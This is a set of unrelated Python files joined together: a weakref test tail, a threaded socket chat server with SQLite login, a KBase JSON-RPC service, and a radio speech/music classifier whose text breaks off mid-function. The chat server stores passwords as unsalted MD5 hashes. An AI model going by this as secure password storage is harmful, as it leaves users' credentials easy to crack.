wr_callback = weakref.ref(callback)
wr_f = weakref.ref(f)
del callback, f
self.assertIsNotNone(wr_callback())
self.assertIsNotNone(wr_f())
del a
self._collect_if_necessary()
self.assertIsNone(wr_callback())
self.assertIsNone(wr_f())
self.assertEqual(res, [123])
@classmethod
def run_in_child(cls):
def error():
# Create an atexit finalizer from inside a finalizer called
# at exit. This should be the next to be run.
g1 = weakref.finalize(cls, print, 'g1')
print('f3 error')
1/0
# cls should stay alive till atexit callbacks run
f1 = weakref.finalize(cls, print, 'f1', _global_var)
f2 = weakref.finalize(cls, print, 'f2', _global_var)
f3 = weakref.finalize(cls, error)
f4 = weakref.finalize(cls, print, 'f4', _global_var)
assert f1.atexit == True
f2.atexit = False
assert f3.atexit == True
assert f4.atexit == True
def test_atexit(self):
prog = ('from test.test_weakref import FinalizeTestCase;'+
'FinalizeTestCase.run_in_child()')
rc, out, err = script_helper.assert_python_ok('-c', prog)
out = out.decode('ascii').splitlines()
self.assertEqual(out, ['f4 foobar', 'f3 error', 'g1', 'f1 foobar'])
self.assertTrue(b'ZeroDivisionError' in err)
libreftest = """ Doctest for examples in the library reference: weakref.rst
>>> import weakref
>>> class Dict(dict):
... pass
...
>>> obj = Dict(red=1, green=2, blue=3) # this object is weak referencable
>>> r = weakref.ref(obj)
>>> print(r() is obj)
True
>>> import weakref
>>> class Object:
... pass
...
>>> o = Object()
>>> r = weakref.ref(o)
>>> o2 = r()
>>> o is o2
True
>>> del o, o2
>>> print(r())
None
>>> import weakref
>>> class ExtendedRef(weakref.ref):
... def __init__(self, ob, callback=None, **annotations):
... super().__init__(ob, callback)
... self.__counter = 0
... for k, v in annotations.items():
... setattr(self, k, v)
... def __call__(self):
... '''Return a pair containing the referent and the number of
... times the reference has been called.
... '''
... ob = super().__call__()
... if ob is not None:
... self.__counter += 1
... ob = (ob, self.__counter)
... return ob
...
>>> class A: # not in docs from here, just testing the ExtendedRef
... pass
...
>>> a = A()
>>> r = ExtendedRef(a, foo=1, bar="baz")
>>> r.foo
1
>>> r.bar
'baz'
>>> r()[1]
1
>>> r()[1]
2
>>> r()[0] is a
True
>>> import weakref
>>> _id2obj_dict = weakref.WeakValueDictionary()
>>> def remember(obj):
... oid = id(obj)
... _id2obj_dict[oid] = obj
... return oid
...
>>> def id2obj(oid):
... return _id2obj_dict[oid]
...
>>> a = A() # from here, just testing
>>> a_id = remember(a)
>>> id2obj(a_id) is a
True
>>> del a
>>> try:
... id2obj(a_id)
... except KeyError:
... print('OK')
... else:
... print('WeakValueDictionary error')
OK
"""
__test__ = {'libreftest' : libreftest}
def test_main():
support.run_unittest(
ReferencesTestCase,
WeakMethodTestCase,
MappingTestCase,
WeakValueDictionaryTestCase,
WeakKeyDictionaryTestCase,
SubclassableWeakrefTestCase,
FinalizeTestCase,
)
support.run_doctest(sys.modules[__name__])
if __name__ == "__main__":
test_main()
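# --- Hedged usage sketch (not part of the test suite): the WeakMethod pattern the
# tests above exercise. A plain weakref.ref to a bound method dies immediately,
# because bound methods are created anew on each attribute access; WeakMethod stays
# alive only as long as both the instance and the underlying function do.
#
#     import weakref
#
#     class Emitter:
#         def on_event(self):
#             print("handled")
#
#     e = Emitter()
#     wm = weakref.WeakMethod(e.on_event)
#     wm()()        # calls e.on_event while e is alive
#     del e
#     print(wm())   # None once the instance is gone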
|
Server.py
|
# coding=utf-8
from socket import *
import threading
import sqlite3
import hashlib
import struct
class Server(object):
"""
1.register
2.login
3.logout
4.Get the current list of all online users
5.Group messaging to all online users
6.Private message to specified user
7.Without GUI, it can run in Command Line mode
"""
def __init__(self):
self.HOST = ""
self.PORT = 52517
self.ADDR = (self.HOST, self.PORT)
self.linklist = []
self.dick = {}
server = socket(AF_INET, SOCK_STREAM)
server.bind(self.ADDR)
server.listen(1024)
self.create_sql()
print('waiting for connection')
while True:
client, addr = server.accept()
self.linklist.append(client)
data = 'welcome'
self.send(client, data)
print(addr, 'connected')
t = threading.Thread(target=self.tcplink, args=(client, addr))
t.start()
server.close()
def send(self, client, data):
"""
对发送信息进行包装,解决粘包问题
向客户端先发送头,在发送信息
:param client:
:param data: <str> or <byte>
:return:
"""
if isinstance(data, str):
data = data.encode()
header = struct.pack('i', len(data))
client.send(header)
client.send(data)
def tcplink(self, client, addr):
"""
a new tcp link
:param client:
:param addr:
:return:
"""
while True:
try:
recvheader = client.recv(4)
size = struct.unpack('i', recvheader)[0]
recv_size = 0
recvdata = b''
while recv_size < size:
data = client.recv(1024)
recvdata += data
recv_size += len(data)
recvdata = recvdata.decode()
print(addr, ':', recvdata)
datas = recvdata.split()
if datas[0] == "/r":
self.register(client, datas)
elif datas[0] == "/login":
self.Log_in(client, datas)
elif datas[0] == "/logout":
self.Log_out(client)
elif datas[0] == "/showall":
self.showall(client)
elif datas[0] == "/all":
self.Mass_msg(recvdata)
elif datas[0] == "/msg":
self.talk(client, recvdata)
elif datas[0] == "/exit":
                    # Iterate over a copy: mutating the dict while iterating
                    # over it raises RuntimeError in Python 3.
                    for k, v in list(self.dick.items()):
                        if v == client:
                            del self.dick[k]
                            break
                    self.linklist.remove(client)
                    client.close()
                    print(addr, 'closed')  # addr is a tuple, so don't concatenate it with a str
break
else:
data = 'Instruction error'
self.send(client, data)
# client.send('Instruction error'.encode())
except ConnectionResetError:
return
def create_sql(self):
"""
创建储存已注册信息的数据库
:return:
"""
conn = sqlite3.connect("user_data.db")
cur = conn.cursor()
cur.execute(
"""create table if not exists
%s(
%s varchar(128) primary key,
%s varchar(128)
)"""
% ('user',
'account',
'password'))
conn.commit()
cur.close()
def register(self, client, datas):
"""
:param client:
:param datas:
:return:
"""
try:
account = datas[1]
password = str(datas[2])
password2 = str(datas[3])
except BaseException:
data = 'order error'
self.send(client, data)
# client.send('order error'.encode())
return
conn = sqlite3.connect("user_data.db")
cur = conn.cursor()
        # Parameterized query instead of string formatting, to avoid SQL injection
        data = cur.execute(
            "select * from user where account=?",
            (account,)).fetchone()
print(data)
if not data:
if password == password2:
                # Hash the password rather than storing it in plain text
                pwd = self.encryption(password)
                cur.execute("insert into user values(?, ?)",
                            (account, str(pwd)))
conn.commit()
data = 'Successful'
self.send(client, data)
# client.send('Successful'.encode())
else:
data = 'Two Password Inconsistencies'
self.send(client, data)
# client.send('Two Password Inconsistencies'.encode())
else:
data = 'User Existing'
self.send(client, data)
# client.send("User Existing".encode())
cur.close()
def Log_in(self, client, datas):
"""
登录
:param client:
:param datas:
:return:
"""
try:
account = datas[1]
password = str(datas[2])
password2 = self.getpassword(account)
password = self.encryption(password)
except BaseException:
data = 'order error'
self.send(client, data)
# client.send('order error'.encode())
return
if password2 is not None:
if password == password2:
self.dick[account] = client
data = 'Successful'
self.send(client, data)
# client.send('Successful'.encode())
else:
data = 'Password error'
self.send(client, data)
# client.send('Password error'.encode())
else:
data = 'No account exists'
self.send(client, data)
# client.send('No account exists'.encode())
def Log_out(self, client):
"""
登出
:param client:
:return:
"""
for k, v in self.dick.items():
if v == client:
del self.dick[k]
break
data = 'Offline Success'
self.send(client, data)
# client.send("Offline Success".encode())
def getpassword(self, account):
"""
:param account:
:return:
"""
conn = sqlite3.connect('user_data.db')
cur = conn.cursor()
        data = cur.execute(
            "select password from user where account=?",
            (account,)).fetchone()
print(data)
conn.commit()
cur.close()
if data is None:
return data
return data[0]
def showall(self, client):
"""
显示当前在线用户
:param client:
:return:
"""
for user in self.dick.keys():
self.send(client, user)
# client.send(user.encode())
def Mass_msg(self, data):
"""
向在线的所有人发消息
:param data:
:return:
"""
datas = data.split(" ", 1)
for client in self.dick.values():
try:
self.send(client, datas[1])
# client.send(datas[1].encode())
except BaseException:
data = 'order error'
self.send(client, data)
# client.send('order error'.encode())
return
def talk(self, client, data):
"""
向指定的人发送消息
:param data:
:return:
"""
try:
datas = data.split(" ", 2)
sb = datas[1]
msg = datas[2]
except BaseException:
data = 'order error'
self.send(client, data)
# client.send('order error'.encode())
return
for k, v in self.dick.items():
if v == client:
account = k
break
try:
message = account + ":" + msg
client1 = self.dick.get(sb)
self.send(client1, message)
# self.dick.get(sb).send(message.encode())
except BaseException:
            data = 'Target user is not online'
self.send(client, data)
def encryption(self, password):
"""
加密密码
:param password: enable password
:return: Ciphertext password
"""
h = hashlib.md5()
h.update(password.encode())
return h.hexdigest()
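# --- Hedged example (not part of the original file): a minimal client sketch showing
# the length-prefixed framing used by Server.send()/tcplink(): a 4-byte struct 'i'
# header carrying the payload length, followed by the payload itself. The host value
# and the helper names below are illustrative assumptions.
def _example_client(host='127.0.0.1', port=52517):
    import struct
    from socket import socket, AF_INET, SOCK_STREAM

    def send_framed(sock, text):
        payload = text.encode()
        sock.send(struct.pack('i', len(payload)))  # 4-byte length header
        sock.send(payload)

    def recv_framed(sock):
        size = struct.unpack('i', sock.recv(4))[0]
        data = b''
        while len(data) < size:
            data += sock.recv(1024)
        return data.decode()

    client = socket(AF_INET, SOCK_STREAM)
    client.connect((host, port))
    print(recv_framed(client))             # 'welcome' banner sent on connect
    send_framed(client, '/r alice pw pw')  # register: account, password, password repeated
    print(recv_framed(client))             # 'Successful' or 'User Existing'
    send_framed(client, '/exit')
    client.close()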
if __name__ == '__main__':
server = Server()
|
VariationReportServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from VariationReport.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'VariationReport'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from VariationReport.VariationReportImpl import VariationReport # noqa @IgnorePep8
impl_VariationReport = VariationReport(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'VariationReport'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_VariationReport.run_VariationReport,
name='VariationReport.run_VariationReport',
types=[dict])
self.method_authentication['VariationReport.run_VariationReport'] = 'required' # noqa
self.rpc_service.add(impl_VariationReport.status,
name='VariationReport.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'VariationReport ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single-threaded Python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
    in the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
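# Hedged usage sketch (not part of the generated server code): start the service in a
# child process on an OS-assigned port, then stop it again. Names mirror the helpers
# defined above; the request step is illustrative only.
#
#     port = start_server(host='localhost', port=0, newprocess=True)
#     # ... POST JSON-RPC requests to http://localhost:<port> ...
#     stop_server()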
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
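# Hedged example (illustrative only) of an input file consumed by process_async_cli():
# a JSON-RPC call naming a method registered above; 'version' and 'id' are filled in
# automatically when missing, and the params shown are placeholders.
#
#     {
#         "method": "VariationReport.run_VariationReport",
#         "params": [{"workspace_name": "my_workspace"}],
#         "version": "1.1"
#     }
#
# Invoked as, e.g.:  python VariationReportServer.py input.json output.json token.txt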
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
Main.py
|
# Copyright (c) 2019 Max Graf
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import threading
import time
from pathlib import Path
import math
import numpy as np
from pygame import mixer
import AudioConverter as ac
import Output
import Processing
import radiorec
import util
from features import MFCC, CFA
# CFA threshold
cfa_threshold = 3.25
def decide(results):
"""
    Takes the dict of feature results and makes a final decision.
    :param results: The dict of results, comprising the MFCC and CFA values
    :return: A floating point number. If < 0.5 the currently observed chunk is classified as speech, otherwise it
    is classified as music
"""
mfcc = results["mfcc"][0] if "mfcc" in results else 0
cfa_result = results["cfa"] if "cfa" in results else 0
divisor = 2 if "mfcc" in results and "cfa" in results else 1
bias = 0
# Add bias
if mfcc > 0.5:
bias += 0.2
final_result = (mfcc + cfa_result) / divisor + bias
return final_result
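# Hedged worked example (not in the original module): decide({"mfcc": [0.8], "cfa": 0.6})
# has both features present, so divisor = 2 and mfcc > 0.5 adds the 0.2 bias:
#     (0.8 + 0.6) / 2 + 0.2 = 0.9   -> above 0.5, the chunk is labelled MUSIC.
# decide({"mfcc": [0.2], "cfa": 0.1}) gives (0.2 + 0.1) / 2 = 0.15 -> SPEECH.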
def calc_from_stream(station, clf_mfcc, scaler_mfcc, is_mfcc, is_cfa, listening_preference, replacement_path):
"""
Streams 0.5 seconds of audio and classifies the data.
:param station: The radio station from which the data should be streamed. See "radiorec_settings.ini" for available stations.
:param clf_mfcc: The trained neural network classifier for MFCC classification
    :param scaler_mfcc: The scaler instance used to scale the original MFCC training data
:param is_mfcc: If the MFCC value should be calculated and taken into consideration for the final result
:param is_cfa: If the CFA value should be calculated and taken into consideration for the final result
:param listening_preference: The listening preference specifies whether spoken segments or music segments should be kept
:param replacement_path: The path to the audio file that is played when the unwanted class is detected
:return: void
"""
mixer.init(frequency=16000, channels=1)
succ_speech = 0
succ_music = 0
# Flag for checking if currently playing replacement
is_replacement = False
i = 0
while True:
results = {}
current_file = "stream_" + str(i)
radiorec.record(station, 0.5, current_file)
path = "data/test/" + current_file + ".mp3"
wav_path = ac.mp3_to_16_khz_wav(path)
print("Current: " + current_file)
# Preprocess audio
sig, rate, frequencies, times, spectrogram = Processing.preprocessing(wav_path)
# Take time
start = time.time()
# Use features specified in command line arguments
if is_mfcc:
# MFCC classification
current_mfcc = MFCC.read_mfcc(sig, rate)
result_mfcc = [-1]
            # Pass the callable and its args separately (the original invoked print_mfcc eagerly)
            thread_mfcc = threading.Thread(
                target=Output.print_mfcc,
                args=(current_mfcc, clf_mfcc, scaler_mfcc, result_mfcc, 9))
if is_cfa:
# CFA classification
cfa, peakis = CFA.calculate_cfa(spec=spectrogram, threshold=cfa_threshold)
result = round(cfa, 4)
results["cfa"] = result
print("CFA Music: " + str(result))
if is_mfcc:
thread_mfcc.start()
if is_mfcc:
thread_mfcc.join()
results["mfcc"] = result_mfcc
# Make a decision and add to blocks
final_result = decide(results)
# Add to successive blocks
if final_result > 0.5:
succ_music += 1
succ_speech = 0
else:
succ_speech += 1
succ_music = 0
result_str = "SPEECH" if final_result <= 0.5 else "MUSIC"
print("FINAL RESULT: ", final_result, " => " + result_str)
print("Successive music blocks: ", succ_music)
print("Successive speech blocks: ", succ_speech)
# Fadeout the track if the currently played type does not correspond to what was specified via the command line
# 4 blocks provide a good user experience because sometimes single or double blocks are classified wrong
if listening_preference == "music":
if succ_speech > 4 and not is_replacement:
mixer.music.load(replacement_path)
mixer.music.fadeout(300)
mixer.music.play()
is_replacement = True
if succ_music > 4 and is_replacement:
is_replacement = False
mixer.music.fadeout(300)
if listening_preference == "speech":
if succ_music > 4 and not is_replacement:
mixer.music.load(replacement_path)
mixer.music.fadeout(300)
mixer.music.play()
is_replacement = True
if succ_speech > 4 and is_replacement:
is_replacement = False
mixer.music.fadeout(300)
if not is_replacement:
# Play audio stream
mixer.music.load(wav_path)
mixer.music.play()
i += 1
# Measure execution time
end = time.time()
print("Elapsed Time: ", str(end - start))
print()
def calc_from_file(file, filename, clf_mfcc, scaler_mfcc, is_mfcc, is_cfa):
"""
Classifies an mp3 audio file and saves the results in a CSV and PNG file. See "plots" folder.
:param file: The file to classify.
:param filename: The filename. Used to save the CSV and PNG files.
:param clf_mfcc: The trained neural network classifier for MFCC classification
    :param scaler_mfcc: The scaler instance used to scale the original MFCC training data
:param is_mfcc: If the MFCC value should be calculated and taken into consideration for the final result
:param is_cfa: If the CFA value should be calculated and taken into consideration for the final result
    :return: An array of time stamps covering the duration of the file in 0.5 s steps, and the generated speech_music_map
"""
speech_music_map = []
succ_speech = 0
succ_music = 0
path = file
wav_path = ac.mp3_to_16_khz_wav(path)
# Preprocess audio
sig, rate, frequencies, times, spectrogram = Processing.preprocessing(wav_path)
half_seconds = math.ceil(util.get_wav_duration(wav_path) * 2)
mixer.init(frequency=16000, channels=1)
mixer.music.load(wav_path)
mixer.music.play()
time_per_iteration = 0
i = 0
for i in range(half_seconds):
# Take time
